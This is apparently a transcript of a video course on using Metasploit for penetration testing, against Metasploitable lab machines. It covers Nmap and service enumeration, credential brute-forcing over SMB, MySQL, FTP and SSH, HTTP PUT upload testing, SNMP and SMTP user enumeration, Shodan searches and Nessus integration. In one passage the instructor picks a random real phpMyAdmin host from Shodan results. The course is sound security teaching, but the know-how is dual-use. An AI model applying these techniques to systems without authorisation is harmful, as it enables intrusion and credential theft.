type in help database to get a look at these commands. And here are some of them. And you can see the names are very clear. Check database status with db status. And Metasploit connected to default MSF3. So you can change this database You can even create your own and connect to that. And that is going to be our next goal. And now I want to introduce you to the workspace concept in Metasploit. It's more like working under a project area, I think. So simply type workspace to see the available workspaces. Now here I have only the default one. The workspace command has a help screen, so you can add, delete, and create workspaces with abandon, according to whatever your requirements are. And the V command will list the workspaces in a verbose mode. And I'll add a couple of workspaces by using A as my parameter. And here are the workspaces that I have added. Now, automatically, the last one is chosen, as you see here. Now, you can also delete a workspace by using the D parameter. And let's say you want to change your workspace anytime. Just write its name after the workspace command. Oh, I'm already using Pentest 4. Alrighty then. Let's connect Metasploit to our own database. So it is quite easy and I think natural if you want to use another DBMS such as MySQL or another database in PostgreSQL. So I'm going to change the current database to another one in PostgreSQL. But before I do that, I need to create a database. So these are my workspaces, but I'm not going to need them now. So I'm going to disconnect from the MSF3 database. Then exit from Metasploit. Now, I think it's good practice to stop PostgreSQL for a while, then start it again. But this is just one of my old habits that I pass on to you. Okay, so now I'm going to get the full name of the PostgreSQL user by these commands. Name is Postgres, type SU, Postgres, to get into PostgreSQL user shell. Now here you're not going to need a password because the default installation there is no password. Now the logic is the same if there is a password, you will need to type it. All right then. List databases with PSQL L, and here are the databases. So now I'm going to create a user first by using the create user command. Create user, user for MSF P. I'm going to enter my very strong password 2 times. And now let's create a database by create DB. That's the command that is owned by the user for MSF that we just created. So create DB, DB for MSF, owner equals user for MSF. All right, so let's list the databases. And sure enough, here I have the database. So I am now finished with Postgres shell and I'm going to exit. And I'll open MSF console in quiet mode again. It's finally open. And let's just quickly check the DB status. So as you can see here, it connects to the default database. So now I'm going to disconnect from that database, and that's successful. Now I'm going to connect to my new database, DB for MSF. DB connect user for MSF. 1234 at localhost 5432/db4msf. 1234 is my strong password, as you can see. All right, so now let's check the status of the database. Okay, good. So here you see that I have connected the new one. And you can now work within the workspaces. Add, delete, choose. It's all on you now. So I'm not going to lie to you. Sometimes you're going to hear words like active exploit or passive exploit, right? Basically, exploits in the Metasploit framework are divided into 2 categories, active or passive. So, what does that mean to you? Active exploits will exploit a specific host, run until completion, and then exit. For example, brute force modules will exit immediately when a shell opens, and execution of the module stops if an error occurs. Oh, and by the way, you can force an active exploit to work in the background by entering J into the exploit command. And of course, on the other hand, passive exploits wait for incoming hosts and then exploit them as they connect. These exploits almost always focus on clients, such as web browsers, FTP clients, and all those. And they'll report shells as they open. Now you can list open shells by entering I with the sessions command. Also, by adding I with the sessions command, you'll be able to interact with the intended shell. Metasploit framework ranks the exploits to help you find the appropriate exploit. And I'll show you all the ranks and their meanings. Excellent. The exploit will never crash the service. This is the case for SQL injection, CMD execution, RFI, LFI, etc. There's no typical memory corruption exploits should be given this ranking unless there are some extraordinary circumstances. Great. The exploit has a default target and either auto-detects the appropriate target or uses an application-specific return address after a version check. Good. Exploit has a default target, and it is the common case for this type of software. Normal. The exploit is otherwise reliable, but depends on a specific version and can't or doesn't reliably auto-detect. Average. The exploit is generally unreliable or difficult to exploit. Low. The exploit is nearly impossible to exploit, or I'd say under a 50% success rate for common platforms. Manual. The exploit is unstable or difficult to exploit and is basically a DOS. So this ranking is also used when the module has no use unless specifically configured by the user. Information gathering or enumeration or reconnaissance, whichever suits you best. Depends upon what spy movies you've seen. In any event, they all define the same concept, that this phase is the initial stage of penetration testing lifecycle. So reconnaissance should be one of the most critical aspects of a successful penetration test for you. This phase involves identification of various software and services running on the target. Now, I'm serious here. The first step for you to take while penetration testing is to figure out which particular version of the software is running on the target. Then you will have a wealth of intelligence about your target by following comprehensive information gathering and enumeration. And that's how you decide specifically which attack is good for you to compromise the system. Now, you may be tempted to immediately launch an automated tool. However, I really do think that these attempts are less likely to help you to compromise the system. Failing in this phase might waste your time and also makes you go around attacking machines randomly. So this isn't something that's good, and believe me, you don't want to do it. So the MSF has enumeration capabilities, and it provides you with many auxiliary modules for performing information gathering. So in order to do that, in this upcoming section, I will be exploring a variety of auxiliary modules within the MSF, so pay attention. And what I'm going to do is enumerate the services that use various protocols, such as TCP, UDP, FTP, SMB, SMTP, HTTP, SSH, and a bunch of others. So as you may know, Nmap is a great tool for scanning and enumeration. And thankfully, it integrates into MSF with the command db nmap. Now, if you connect the MSF to a database, you can store the scan results for later use as well. By using Nmap, you can practically detect hosts and services on your target network. Nmap has various features and scanning techniques. I'm not going to cover all of them here, but here I will make a SYN scan, TCP scan, and service detection on the target host. And then after this, you can either use Nmap from MSF console or use the db nmap command with almost all the options that Nmap provides. But whenever you run the db nmap command, the scan results will be stored in the database automatically. However, you may also wish to import the scan results into another application. So you may want to export the scan results into an XML file. So let's open your terminal command and start the MSF console. And to take advantage of the db nmap command, Metasploit must be connected to a database, and then the usage is quite similar with the Nmap. Actually, Nmap, I don't want to discount it. It is a wonderful tool. Integrating it with MSF closes a huge gap while using Metasploit. So let's just simply use db nmap as the command with nmap as the parameters. So Nmap, as I said before, has a variety of options and different scan types to be able to enumerate the target. And one of them is the SYN scan, SS parameter. This runs a stealthy TCP scan over the network and looks for TCP-based open ports, but it doesn't complete the three-way handshake. Nmap TCP scan, ST parameter. This runs a TCP connect scan over the network and looks for TCP-based open ports as well. This, however, completes the three-way handshake. And then the last one is service detection. It tries to detect the services on the target by sending some network probes. Nmap is really smart. Now, before scanning all the hosts in a network, it first identifies if the host is alive. So the PN option means you don't have to use the ICMP ping command to determine if the host is alive. And the P parameter specifies the port numbers. In this case, I want all the ports to be scanned. And we have the scan results for Metasploitable 2 and 3. See, Nmap did a good job. And now everything is saved in the database. And now you can manage your hosts by using the hosts command. And also you can view services by using the services command. Excellent syntax. With the services command, you can actually go deeper. So let's have a look at the help screen for this command. You can perform specific searches and listings. Enter the C parameter, and then enter name and port to get this information. You can search with the S parameter. And now this is the hosts command help screen. So like the services command, the C parameter will help you make special lists. Nope, it's wrong here. So I'm going to delete this empty character. Okay, so now it's okay. So I want to show you one more command. It is the vulns command. So it helps you to list the vulnerabilities of the hosts. However, you don't import any vulnerability scan as a result. So in addition to running Nmap or other third-party scanners, there are several port scanners that are available in MSF for you as well. They come in as auxiliary modules. Now, besides using the db nmap command, you can try one of these as well. So let's have a look at one of them. Let's list them with the search command. And here are the port scan modules listed. So now I'm going to pick the SYN port scanner. To view its information, I get a short description and some variables, not much more. Now I want to show the options. So I'm going to set our hosts to Metasploitable 2 and 3 IP addresses. But let me say a couple of things at this point. You might remember I mentioned earlier that these variables define your target's IP addresses or yours. So it's a pretty good example of the ease of use for MSF because these types of variables take IP ranges, CIDR ranges, multiple ranges separated by commas or line-separated hostless files, then run the module. So if I don't change the default value for the port variable, the module is going to scan port numbers between 1 and 10,000. It may take a few minutes. Now we've got the result. And as you see here, the module did a really good job for us. So using these modules can come in really handy. Bet you didn't know that, did you? SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers. In addition to that, Samba is a freely available SMB server for Unix. It's an implementation of SMB for Unix-like systems. SMB can run directly over TCP ports 137, 139, 445, or on UDP ports 137 and 138. Now, some versions of SMB protocol has known vulnerabilities, so you should enumerate the SMB services. Now let's step back into the lab to use MSF modules for SMB. All right, so you have made a scan over Metasploitable 2 and 3. To check to see if the SMB port is open, type the services command with a P parameter and SMB port numbers 139 and 445. And the ports are open on both machines. MSF has a meaningful directory structure, so you can find SMB-related auxiliary scanners under this directory. You're not going to need to write every word. Just hit the tab button to complete the commands. Now, the basic logic behind the enumeration is service banner and version detection. So that means I will first run the SMB version module, show options, and set our hosts to our target's IP addresses. And then you can run the module. That module executed very quickly. But look at that, though. It does bring some really good information about the targets. So as you can see, 10.10.2.10 is a Windows Server 2008 R2 Standard Service Pack 1, which is Metasploitable 3. Now, on the other hand, Metasploitable 2 has Samba. Now, why is the version detection important? I hear you saying and scratching your head. Well, let's have a look at the Samba version. This version of Samba has a vulnerability. Even Metasploit has an exploit for this. So, I think you get the point. But just one more point here. Metasploit saves this information to improve your penetration tests. So let's type hosts as our command with C as the parameter. Now you see, Windows 7 changed to Windows 2008. So now let's go with another module. You can try all the others, but I'm going to choose SMB MS1710, show the options, set the rhosts variable, and run the module. And it looks like Metasploitable 3 is vulnerable to MS17 through 10. So let's Google this vulnerability, shall we? There are many topics about this vulnerability, and Metasploit has an exploit module for that particular vulnerability. So that's a good way, I think, to illustrate how enumeration gives you better results. So make a note of this vulnerability. You're going to need it later. Okay, so let's go back to the MSF console. All right, so this is the last one. This is the SMB login module. I will immediately set our hosts. Now I'll need a dictionary file to brute force. So in a new tab, I will create one. For this, you can use the Cool tool. It's really simple and very handy. D for how deeper to crawl a target page, and M for minimum character numbers for words in the dictionary, and then the name of the output file. So here I'm going to use the address of the GitHub page of Metasploit 3 as the target page that Cool will derive the words from. So this process can take way too much time, but I'm going to stop it here because the dictionary file has already been created. So let's go back to the MSF console and use it. I'll set the SMB user to Vagrant, set the pass file to that dictionary file, and then run the module. So I'm going to interrupt the execution. Did you see at the beginning of the output, did you notice the green color? That's because you need to enter the pair vagrant, vagrant. Okay, so that's what we need. So make a note of that. Now, SMB reveal is the valuable information that you get. MySQL is one of the most used databases, and it's almost in every network, either for production or for development purposes. Out-of-date or poorly configured MySQL installations may allow you to get in the system. So, your first step is to discover the version. MSF has a couple of modules for MySQL. So let's have a look at them and gather information from the MySQL server in order. So do you remember, as I do, that there are MySQL databases in the result of the db nmap command? So then how do you view it? I can view it by going to Services, P3306, entering that command, and sure enough, there they are. So there are some useful auxiliaries in Metasploit for MySQL, and you can search it like that. So here they are. And like always, I will start with version enumeration, although Nmap already did it. Show the options. Just going to set our hosts as my variable. Show options. And run. Yeah, it's executed quickly, and the result is the same as the db nmap command. So check this out. Now I'm going to use the MySQL login module. Show the options. And the rhost's value comes up globally. And there are some file variables, as you can see. And I'll set blank passwords to true. So the module will try blank passwords also. So I'm going to start a brute force in just a little bit, but I first need to create a dictionary file specialized for MySQL. And to accomplish this, I'll search on the internet for a reasonable dictionary file, or you can also create one by yourself like we did earlier. But I just want to use the related words like this. So here in the second row, there's a GitHub page. And under default credentials, you will see a MySQL default password file. So I'm going to copy that and say thank you to the owner of the page. Okay, so I'll save it in a file in Kali. And I'll save it here in the desktop. I think I did that before. So let's go back to the MSF console. Set the user pass file variable to the file that you've just created. Okay? Then run. And I think you can catch some user password pairs. So you should make a note of this finding because you will need to use this one later. Okay, so this means that you're really starting to discover and understand your target system. Let's get into the next one. Now, as you probably already know, File Transfer Protocol, or FTP, is used for the transfer of files between a client and a server using port 21. Poorly configured FTP servers can be a good foothold. So, you can run some MSF modules to enumerate FTP servers and gain some important information such as software version, banner info, and all that. Aside from this, the FTP servers authenticate users with a clear text sign-in mechanism. Moreover, it can sometimes allow anonymous login. So why don't we enumerate an FTP service? So let's have a look and see which hosts have FTP services. All right, so both of them have. But sometimes administrators use different ports for the services. So let's try a search with the S parameter. And just like that, you can find all the FTP servers that dbnmap command discovers. And yeah, as you see here, there's an FTP service running on port 2121. And then you'll get this list if you search for FTP auxiliaries. And I'll just use these ones here. Use auxiliary scanner, FTP, and FT version module. Show options. Nothing set. So let's run the module. And there's the results. Now you can do the same process for every FTP port, but here's an important point. If you get the version, look for vulnerabilities on the internet or somewhere else. So what I'll do is I'll copy and then search Google or whatever your favorite search engine is. And you see VS FTP has a vulnerability for this particular version. And even Metasploit has a module for this. So make a note of that because you will use it later. Oh, and by the way, this is a lab environment, remember, but the logic is 100% the same as in any real penetration testing. So I'll use another module, FTP login, showing options, and here are the file variables. So I'm going to allow blank passwords and username as password. And here I'll set user pass file to my FTP dictionary file. I'll create this list from the same address that I did for MySQL. All right. Run the module. And I think you'll probably find one pair. So make a note of that too. Now, one more module. Some FTP modules allow for anonymous logins. So when you perform a vulnerability scan, you probably are going to get this finding. But you can quickly check to see if any of the discovered FTP services allows this. That's why this module is so handy. Show options. Okay, so I'll need to configure nothing, so I'll just run the module. And the result comes up pretty quickly. So yeah, you can connect this FTP service on Metasploitable 2 anonymously. So now that we got the hang of that, let's enumerate some other services. SSH stands for Secure Shell and works on port 22. It helps administrators make operations over an encrypted channel. Now, although SSH might come in handy when you want to access remote systems, sometimes, but not so often, but it's good to be aware of it, SSH itself can have some configuration vulnerabilities. So let me just quickly show you an example of a poorly configured SSH server. So first, let's search for SSH auxiliaries. There aren't too many modules. And I'll follow the same sequence that I did in the previous videos. And I'll try to discover the version, the users. So I will pick SSH version as my first module. Show the options. Now, because I set the rhosts variable as global, the value is automatically assigned. And there's nothing changed here, so let's run the module. And here's the result. So it contains more details on the SSH services on both machines. You should also make a note of that. Now, I don't want to look for vulnerabilities for these versions, but you can if you want to, and test them in the lab environments if you find any. So, okay then, I'm going to use SSH login as my next module. Show options. And I will allow the user name as password and accept blank passwords. Now, I won't create a dictionary file again. So I'm going to use the file that I created for FTP. And I don't think we need anything more. So let's run the module. Now, here I get a username password pair, vagrant, vagrant. Remember that also. And then Metasploit automatically opens a session for us on port 22. So now we can interact with that session. So now let's enumerate the next service. HTTP is a stateless application layer protocol. Generally uses TCP port 80 and exchanges data over the World Wide Web. You can fingerprint the HTTP service and gain a whole lot of information about the target system. To accomplish this, MSF has some HTTP modules. Now, besides MSF modules enumerating the HTTP service information, they will also help you looking at backup files on the web server, listing directories, checking the validity of SSL certificates presenting on the web server. But mainly, reconnaissance-related auxiliary modules will be listed under the Auxiliary Scanner HTTP. And one more thing about the ports is that HTTP uses 80, and when it comes as HTTPS, it uses port 443. But both ports are not mandatory. Why is that, you ask? Well, administrators can easily change the port that the web application is served on. So be careful. You may see a web app serving on port 6500. That's nothing new for a pen tester. So let's jump into a practice session. So I think you probably have many HTTP services running on your targets. So let's view them using the services command. And you see there are a lot of HTTP services. And let's have a look at the port numbers. In the real world, it is the same. But here, there are only HTTP services, right? So I can also look for HTTP with SSL, like this. There, another port number comes up. And just like I did before, I will search for HTTP-related auxiliaries. Whoa, okay, so there are too many modules. Some of them are for applications that use HTTP or HTTPS. So it's kind of hard to find some of the core modules for HTTP itself. So why don't we make a short list? That's going to be a handy shortcut for you to start with enumerating HTTP. So let's go back to Services. Okay, so now I want to show you something. Look what you have here. A web dev service. Now, this might look kind of old school to you, but you can see in the local networks. This is Metasploitable 3. A web dev service is also available on Metasploitable 2. So you can use all these modules in the lab to improve your skills, but I'll intentionally choose HTTP put module. Show me the options. Right, so this module will use HTTP put as the method to test if the web server allows for uploading a junk file. But the module wants a path variable. So I can try every possible path on the server. Let's try to find a reasonable path. So at this point, I'll use another module, crawler, and then this module will crawl pages and list the paths on the server. Show me the options. And I'll quickly set the variables. Our port to 8585. All right, so let's check. And run the module. So as it finishes up, you have discovered a few paths. And here, the uploads path probably is what you were looking for. So what I'm going to do is I'll use this path, and I'll turn back to the HTTP put module. Show the options again. Just going to set our hosts as my variable. Set path to uploads. Everything looks good. So let's run the module. And it happens very quickly. There it is. You're successful. So now you can upload a malicious file to the web server and call this file to get a session on the server. So if you follow the link, you will get this page. And this proves that one can easily upload something to the server. That is what a vulnerability is. The Simple Network Management Protocol, SNMP, is used to query network devices for information such as bandwidth utilization, collision rates, and a whole lot of other information. But it doesn't only provide network management and monitoring capabilities, but it's also capable of changing the configurations on the host, allowing the remote management of the network device. Yes, I can tell this gets you excited, huh? My young apprentice. And you are right. So SNMP servers can offer considerable information for penetration testers to perform reconnaissance on a specific system. You may also see SNMP installations on some operating systems to specify information such as CPU utilization, free memory, and so on. It's often automatically installed on many network devices with public in the read string and private in the write string. On Windows-based devices by poorly configured SNMP, you can extract patch levels, running services, usernames, uptime, routes, and, well, so much information that it'll totally level up the penetration test for you. So let's use the services command to search for SNMP service. And yes, indeed, you only have to open the SNMP port on Metasploitable 3. The version is 1. SNMP version 1 and version 2 both have proven security flaws. But SNMP version 3 is improved with encryption as well as better check mechanisms. But anyway, I'll search for SNMP auxiliaries. And this time I'm going to start with SNMP enum. Show me the options. Oh, and by the way, the community strings are essentially passwords that are used to read or write information to a device. So if the SNMP version is right, and you guess the community strings, the SNMP itself can allow anything from excessive information disclosure to full system compromise. Let me give you an example. If you get the read-write SNMP community string for a Cisco router, you can download, modify, and upload the configuration to the router with a backdoor. So here, I'm not going to change the community variable. I will just set the port to 161, and yeah, everything looks quite good. Now I'll run the module. So as you can see, SNMP brings all the information about the target, Metasploitable 3, from running applications to network interfaces, service information, device information, user enumeration, nearly everything about the target. SMTP serves on port 25, and it's used for sending and receiving emails. So this service has two interesting commands that reveal information about the mail server users. They are EXPN and VRFY. There are numerous ways to get names with these commands, but let's go and check out the MSF auxiliaries. So these auxiliary modules probe the SMTP server on the target for the version and then list the SMTP server users. So you have a SMTP port open on Metasploitable 2. Services, SMTP, and here's the info. SMTP verify, that's a command that helps you to check for users. And before using any module, I want to show you that from the MSF console tray, you can connect SMTP service on Metasploitable 2. Telnet 10.10.2.10.25, and the connection's established. So, verify admin. There is no admin. Verify Metasploit. Okay, no user with that name. Verify MSF admin. Okay, yes, so I found one username. Verify root. Yeah, second username. Verify administrator. Okay, no user with that name. Verify sys. Another correct username. I think you get the point. Because without any vulnerability, you get usernames. Exit Telnet. Oops, quit Telnet. Okay, so as always, search for SMTP auxiliaries. And first, pick SMTP version. Show options. Okay, so I will set our hosts to 10.10.2.14 and run the module. So this is the SMTP service banner. Now let's pick another module. SMTP enum. Show options, and I will very quickly set our hosts. So let me check if everything is fine with all the variables. Okay, so set threads to 10 and run the module. Okay, so I think I have a problem with module execution. Did you catch it? Because it lasts a whole lot longer than it ought to. So let's set threads 1 again and run the module. And this time it works. And here are the SMTP users. So make a note of these users. You're going to be able to use them in the brute force dictionaries. Shodan is a search engine over the internet for finding connected devices. If a device is directly hooked up to the internet, then Shodan queries it for various publicly available information. So it scans the entire IP version 4 network and parses the results using the banner information. The types of devices that are indexed can vary tremendously, ranging from small desktops right up through nuclear power plants and just about everything in between. Some describe it as a search engine for hackers. Now, Shodan is integrated with MSF, so you can query Shodan from MSF. However, to accomplish this, the first step is to get an API key by registering with Shodan. Then you can use Shodan from MSF console. So I'll set up a search for Shodan just like that. Okay, so there are only 3 auxiliaries for Shodan, and I'll use the Shodan search module. Okay, so now show the options. And these are the options, and as you can see here, you don't have classic variables such as rhost and rport. But there is an important variable here. It is Shodan API key. Now, you must have an API key to perform searches on Shodan. So how about if I show you the Shodan interface and copy my API key to use? So go to your web browser and just type Shodan in the address bar. And of course, the first row of the result list is what you're going to look for, shodan.io. Now, I suggest strongly that you explore the website and create an account, because you're really going to get to love Shodan. So now I'm going to log in. This is my account's homepage. And in the upper right-hand corner, there's a button, and it's called Show API Key. So let's click on that, and here's my API key. You can get one for yourself in exactly the same way. But what I'm going to do is I'll copy it, and I'll use it in my MSF console. Then go back to MSF console. Alrighty, so now I set the Shodan API key variable to the copied key. And let's write a query to the query variable. Let's look for PHP myadmin pages. Now, wouldn't you love to have some search filters here, but I can't at this point because I don't use the paid service. So I'll just make a simple search. And let me check one more time just to make sure everything's right. Okay, now we can run the module. Now, sometimes it takes a while, but don't think it's not working. So here are the results. And let's randomly choose an IP. So I'm going to copy this and open it from the browser. And this is your imaginary targets page. Now, what I want to do here is, you can look for internet-connected services that your target's connected to. Besides a keyword search, Shodan allows you to be specific in your search. So what does that mean? You can, for instance, find devices by city, country, or IP address range using CIDR notation. So we can get even more specific, providing it with GPS coordinates, hostname, operating system, and port. So I've made a random search, but you can also make a detailed one. All right, now, after gathering enough information about the target system, I think it's time, don't you think? I think it's time to check and detect if the target system is vulnerable. Now, finally, we get to the vulnerability scanning page. So in this section, we're going to discuss a number of vulnerability scanners and how they can integrate with Metasploit. Whether or not you use an automated scanner or do it manually, scanning is one of the most important steps in a penetration test. Because if you do it properly, it's going to give you the best value. And what does that do? Gives the best value to your client. So what happens in this phase? Vulnerability scanning or analysis is the process of detection and the assessment of the vulnerabilities that exist within the target system. So at this point, let's just define what actually a vulnerability is. So vulnerability is a weak characteristic of an asset that allows an attacker or a pen tester to exploit and gain unauthorized access. All right? So then what is a vulnerability scanner? It's an automated program, typically, designed to look for weaknesses in networks and applications. They send some data over the network and analyze the responses by using their vulnerability database as a reference. Now, because different systems behave differently when particular network probes are sent by vulnerability scanners, these unique responses serve as a fingerprint that determines the operating system version and even its patch level. A vulnerability scanner can also use a given set of user credentials to log into the remote system and enumerate the software and services. Now, with the results that it obtains, the scanner presents a comprehensive report and an outline of detected vulnerabilities on the system. Now, that report is what's useful for you to get a quick idea and understanding of what attacks might be worthwhile conducting. However, vulnerability scanning is well known for a high false positive as well as false negative rate. Just keep this in mind when you're working with a vulnerability scanner. And one more thing to keep in mind, these scanners create a lot of network traffic, and this huge traffic uptick will expose you. So, if you want to remain undetected, you might not want to use these. But if being stealthy is not important, like we were speaking earlier, if you're working with your client, then you got to do your best with vulnerability scanners. So I'll also highlight some auxiliary modules in the Metasploit framework that can locate specific vulnerabilities. So let's look through some of the vulnerability scanning capabilities that the Metasploit framework can provide. But first, we will work with Nessus. Nessus is a commercial vulnerability scanner that is delivered by Tenable Security. Nessus automates the testing and discovery of known vulnerabilities before hackers and penetration testers like you take advantage of them. It has one of the largest vulnerability knowledge bases available, and it efficiently identifies weaknesses and configuration issues in a target network. Moreover, it suggests solutions for the vulnerabilities that are identified during the scan. Thankfully, Nessus has a home edition for personal use in non-enterprise environments, and it can also integrate into MSF. So let's download Nessus now. I'll show you how to install it and then integrate it within MSF. You can easily download and install Nessus Home. So open your web browser and search for Nessus Home. And you'll see a link like this and click it to get to the product page. Right, so here are all of the Nessus editions. So, like I was saying before, we're going to use the Home Edition. But believe me, just because it's a Home Edition doesn't mean it lacks punch. This version is amazing. So, click the Register Now button. Fill up this form. I'll just buzz through it quickly. First name, John. Last name is Doe, with 3 E's. And the email is johndoe@yopmail.com. Yopmail is a disposable mailbox. In case you haven't heard of it, it's really handy, like in these kind of situations. So then click the Register button. And now I'm on the download page, so click the download link. Now here is where you've got to choose the suitable version for your operating system. And here is the 32-bit version for Kali, in case you're still back in the 90s. No, I'm kidding. I'm just going to use the 64-bit version for Kali, so I'm going to download this one. As always, I read every word in the agreement. There's no problem. So I agree. And save the file. Now, of course, it depends upon your internet speed, so it may take a while, it may not. I'm not going to wait that long, and I'm not going to make you wait that long, so I'll just, my download's finished. It's magic, and I'm going to go to the download directory. Now, right-click here and open up the terminal. Let me rearrange my screen so that you can look over my shoulder. All right, so the installation is pretty easy. Just type dpkgi and the Nessus file name. So I will copy this command to start Nessus. Weird. So I'm going to start it up manually. Service Nessus D start. Service Nessus D status. Okay, starts. So click this link now. And in just a second. So this is a warning for the self-signed certificate of Nessus. So don't worry about that right now. So click Advanced. Add exception. Confirm the exception. And now you've got to create a user. So I'm going to write root, but this is not necessarily necessary. You can always type something else. Define a password. And click Continue. So here it wants the activation code. So in a new tab, I'm going to go to Yopmail and my John Doe mailbox. So here's the license. They sent it over to my mailbox. So I can just copy that, paste it, and continue. So the setup will first download the Nessus plugins, and this is how they will be compiled. This whole process will take a little time, but then the home page will open. I'm going to stop my recording here, and I'm going to come back after completion. So my installation's finished, and this page is automatically opened. Congratulations, you have installed Nessus Home Edition. So the next thing is to go use it in your laboratory. I'll see you in the lab. So now I'm going to check the Nessus service and start it. Okay, so open your browser now and type https://kali:8834. And then this will take you to the Nessus login screen. So in the beginning, you may see an initialization screen like this one. So just enter your credentials and hit the sign in button. Okay, so now this is the Nessus homepage. It has a pretty clear and clean interface. So what I'm going to do is quickly add a folder for my scans and name it PWMSF. So create the folder. Now let's go into the folder. Okay, so now you have two options here. You can either create a scan directly, or you can create a policy and then use this policy for a particular scan. Me, I always create policies, because then I can use them in every penetration test that I do. So I would advise you to do the same. Just follow along. So even now I'm going to show you how to create a policy. So click here to start. Right, so now these are the predefined policies. Now for your purpose, you can choose one of them, but also you have the option to start a custom policy. So over here on the upper left corner, there's an advanced scan. So click here. All right, so let's give it a name and description, and that's going to be your first scan. So Nessus provides you an ability to share your policy or scan with other users. So if you want, under the Permission tab, select Can Use as an option. Under the Discovery menu, you'll find how to discover hosts and services, and you can also configure how to scan the ports on the target. And there's really nothing to change here. Assessment menu. It provides some extra assessment configuration. Now here under brute force segment, I want you to check this box to not try after successful login. All right, so you have web applications in our lab. Open it. I won't change anything under Windows and malware segment. Now you can specialize your reports, but I think it doesn't allow much more than that. This might be, if there is one, a negative side of Nessus. And the advanced menu. See, now, I think I've said this before, but being stealthy is important. So you've got to check here to randomly scan targets. And also check here to prevent network congestion. And under the Credentials tab, Nessus gives you the opportunity to scan targets with custom discovered credentials. Nessus will perform more tests on the targets if valid credentials are given. And you can also add hashes as well as some other service accounts. So earlier we have discovered how to use the Vagrant username and password. So that's what I'm going to use. Compliance tab. Not going to change anything here. This could be a good benefit for you when you perform a vulnerability assessment. Now here, there are many compliance checklists. You can choose a bunch of them and run a scan. But for now, I don't need that. And here's the Plugins tab. So Nessus actually takes its power from plugins. Every plugin performs a particular task, and the Nessus team divides plugins into families. So for example, the denial of service plugins resides under this category. Now, you also have to be careful to check the plugins because every unrelated plugin will create congestion in the network, and that prevents you from being stealthy. And also, some plugins could very well crash the system. So right now, I am going to quickly uncheck unrelated plugin families. I'm not going to touch plugins itself, but you can be that specific. So, finally, save the policy. Okie doke. So now you need to create a scan that's going to use this policy. So go up here to the top menu, Scans, and here are the predefined scans. But if you want to use your policy like I do, follow me and go to the User Defined tab and click your policy. Now this screen comes up. So name your scan and give it a description. And I'm going to choose the folder PWMSF, and now you can add targets. So, of course, we're going to use both the Metasploitable 2 and 3 IP addresses. All right, so let's save the scan. Now, let's check the scan here, and from that menu, just launch it or reconfigure it. I'm going to launch it. Okay, so now you can watch the progress and examine what Nessus finds. Scan's going to take some time, so I'll just let it finish up, and I'll get right back to you. All right, great. So the scan has finished, and let's export the report. Nessus has a few options for exporting the results. So if you want to import these results in Metasploit framework, you should export as the Nessus format from here. Actually, it's just an XML file. So I'm going to export it and then move it to my desktop. Now let's go back into the MSF console. And just like before with importing Nmap scan results, you can do the exact same thing to bring in the Nessus results. db import is the command for different types, and you can easily import the downloaded Nessus scan result. So let's type in db import, and after that, type the path of the Nessus scan report, and that's it. So importing is successful. All right, so you can view the scan result with vol ns command, and here is the help screen. For example, to display SNMP-related vulnerabilities, use vol ns s snmp as your command. So let's say I want to be more specific. For example, SMB service. So to display the SMB-related vulnerabilities, you can just search just like that. And here are the SMB-related vulnerabilities. Now, the first one is really important because this one has a very handy exploit in MSF. You probably remember you faced this one in some of the previous stages of this course. And I hope you can read some articles about it so that you can get some of that in-depth stuff you crave. So when you make a quick search like this with MS17010, the result is here. So MSF has these modules. You can examine the result just like that and use the vulnerabilities found by Nessus. So there's more to the integration between Nessus and Metasploit. We're not done yet. You can even start a scan and create a policy from Metasploit. And it just so happens that Metasploit has a plugin for this. And guess what it's called? Nessus. So load the Nessus plugin. Type Nessus help to display plugin commands. And you need to connect to the Nessus service to benefit from all these commands. So to do that, type Nessus connect as your command, and after that, type in your username, your password at your IP address of the Nessus server, and the port number 8834. Now, don't forget to add the SSL ignore command to bypass the self-signed certificate problem. All right, good. It connected. So now you can list scans and policies. Nessus scan new is the command that will create a scan, but we're also going to need a policy too. So here's my custom policy that I created within Nessus. Create a new scan and copy and paste this policy UUID value. Now let's provide the name, description, and the targets. All right, so now we can launch the scan. And the scan's running now. So let's go back and check it from the Nessus interface. And here's the scan we started. And you can also stop a scan from the MSF console. And looking at the interface, yep, it's really stopped. You with me? Good. Everything is okay, so let's start getting our hands dirty. Now, because Metasploit framework is embedded in Kali, you can type MSF console in any location in the terminal screen to start Metasploit framework console interface. You'll be facing the shell-like MSF interface in just a few seconds. And here we have a summary. Numbers of exploits, auxiliaries, and post modules, and numbers of payloads, encoders, and NOPs. The first command that you should learn in MSF console is, of course, help. The help command lists all the commands you can use at this point. And you heard me correctly, I do say at this point, because any module you load may add some new commands you can use. But we'll see soon, and I'll let it go for now. As you can see, the commands are grouped. Here are the core commands, module commands, job commands, resource script commands, and credential backend commands. Now, to search for a module you want to use, for example, to see the available exploits developed to exploit Net API vulnerabilities, you can simply use the search command with a keyword. And here are the results. Exploits for several Net API vulnerabilities. The first one is to exploit the MS03-049 vulnerability, and we have 4 exploits for 4 different Net API vulnerabilities. Now, you can see the columns, name of the module, disclosure date, rank, and description of the module. Since the names of the other columns explain themselves, let's talk about the ranks. In Metasploit framework, the exploits are ranked to help us select the appropriate exploit. Here are all the ranks and their meanings. Starting off with excellent. The exploit will never crash the service. This is the case for SQL injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploit should be given this ranking unless there are extraordinary circumstances. Great. The exploit has a default target and either auto-detects the appropriate target or uses an application-specific return address after a version check. So good is that the exploit has a default target and it is the common case for this type of software. English, Windows 7 for desktop app, 2012 for server, etc. So normal, this exploit is otherwise reliable, but depends on a specific version and can't or doesn't reliably auto-detect. Average, the exploit is generally unreliable or difficult to exploit. And low, the exploit is nearly impossible to exploit, or under 50% success rate for common platforms. And manual, exploit is unstable or difficult to exploit and is basically a DOS. This ranking is also used when the module has no use unless specifically configured by the user. For example, exploit/unix/webapp/php eval. Exploitation phase. So although MSF has now become a multi-purpose penetration testing tool, at its heart, it is an exploitation tool. So believe me when I tell you that it integrates with many other tools, and, well, to do a penetration test, you could really only stick with this. But I assure you that MSF gains a lot of power with the exploits that it has. And of course, the ease of exploitation is another reason for its power. Now, up to now, you have seen a lot of features, but now I'm going to take you to the best part. In all the previous sections, you enumerate the system and then gain the information, and then you perform a vulnerability scan on the targets and realize some of the vulnerabilities. But now comes the best part. It's to exploit these vulnerabilities and gain remote access to the targets. So I got to tell you, and I speak from experience here, that the ability to gain full control over a targeted machine is, it's a great feeling. So I want to show you a way to follow. Then your approach is to review the vulnerabilities detected in the previous stages and then sort through them by the reliability and the potential harm to the target network. So I'm first going to focus on the basics of exploitation, and that way you can familiarize yourselves with the different 